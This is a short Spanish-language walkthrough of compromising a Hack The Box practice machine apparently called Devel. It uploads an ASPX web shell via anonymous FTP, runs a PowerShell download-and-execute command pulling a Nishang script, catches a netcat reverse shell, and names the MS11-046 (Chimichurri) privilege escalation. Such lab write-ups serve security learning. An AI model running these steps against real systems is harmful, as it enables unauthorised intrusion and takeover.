Esta es la segunda vez que hago esto pero esta vez sin metasploit.

Lo primero que nos damos cuenta con el nmap es que esta FTP con acceso anónimo y el asp

root@Kali2:~/Downloads# nmap -sC -sV -O
Starting Nmap 7.70 ( ) at 2019-11-03 19:39 CET
Nmap scan report for
Host is up (0.022s latency).
Not shown: 998 filtered ports
21/tcp open  ftp 	Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM   	<DIR>      	aspnet_client
| 03-17-17  04:37PM              	689 iisstart.htm
|_03-17-17  04:37PM           	184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http	Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 22.73 seconds

Como la maquina era muy lenta en vez de conectarme por FTP entre con filezilla

Subí la shell que esta en kali

root@Kali2:~/Desktop# locate cmd.aspx

Y puedes entrar por el browser a

Desde ahí lo normal. Nishang

powershell.exe IEX(New-Object Net.WebClient).downloadString('')
root@Kali2:~/Desktop# nc -nlvp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 49167
Windows PowerShell running as user DEVEL$ on DEVEL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>

Con systeminfo

PS C:\windows\system32\inetsrv> systeminfo

Host Name:             	DEVEL
OS Name:               	Microsoft Windows 7 Enterprise
OS Version:            	6.1.7600 N/A Build 7600
OS Manufacturer:       	Microsoft Corporation
OS Configuration:      	Standalone Workstation
OS Build Type:         	Multiprocessor Free
Registered Owner:      	babis
Registered Organization:   
Product ID:            	55041-051-0948536-86302
Original Install Date: 	17/3/2017, 4:17:31 ??
System Boot Time:      	7/11/2019, 4:33:20 ??
System Manufacturer:   	VMware, Inc.
System Model:          	VMware Virtual Platform
System Type:           	X86-based PC
Processor(s):          	1 Processor(s) Installed.
                       	[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:          	Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:     	C:\Windows
System Directory:      	C:\Windows\system32
Boot Device:           	\Device\HarddiskVolume1
System Locale:         	el;Greek
Input Locale:          	en-us;English (United States)
Time Zone:             	(UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 	1.023 MB
Available Physical Memory: 689 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.458 MB
Virtual Memory: In Use:	589 MB
Page File Location(s): 	C:\pagefile.sys
Domain:                	HTB
Logon Server:          	N/A
Hotfix(s):             	N/A
Network Card(s):       	1 NIC(s) Installed.
                       	[01]: Intel(R) PRO/1000 MT Network Connection
                             	Connection Name: Local Area Connection
                             	DHCP Enabled:	No
                             	IP address(es)

Vemos que es exactamente lo mismo que artic asi que podemos hacer priv esc con chimichurri o con ms11046
Solo ejecutandolo me da una shell